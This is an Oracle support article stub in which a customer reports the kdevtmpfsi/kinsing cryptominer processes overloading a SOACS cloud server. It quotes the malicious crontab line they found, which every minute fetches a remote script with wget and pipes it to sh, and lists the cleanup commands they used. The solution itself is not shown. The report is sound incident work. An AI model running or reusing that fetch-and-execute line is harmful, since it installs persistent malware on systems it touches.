SOACS Cloud Server - Process Kdevtmpfsi Consuming High CPU Causing SOACS Down Issue
(Doc ID 2901290.1)
Last updated on OCTOBER 10, 2022
Applies to:
Oracle Network Cloud Service - FastConnect - Version 1.0 and laterInformation in this document applies to any platform.
Goal
We found on our SOACS Cloud server, processes kdevtmpfsi and kinsing were consuming high CPUs. Because of it weblogic services went down.
We found below entry inside our crontab which was unusual.
* * * * * wget -q -O - http://XXX.XXX.XXX.XXX/wb.sh | sh > /dev/null 2>&1
We killed processes kdevtmpfsi and kinsing and removed below files. Then load on system came back to normal.
rm -vf /tmp/kdevtmpfsi
rm -vf /tmp/kinsing
But why it happened and how these entries got added in Oracle server in first place as it can also happen to our PROD instances so we need to find root cause of this issue.
Solution
To view full details, sign in with your My Oracle Support account. |
|
Don't have a My Oracle Support account? Click to get started! |
In this Document
Goal |
Solution |
References |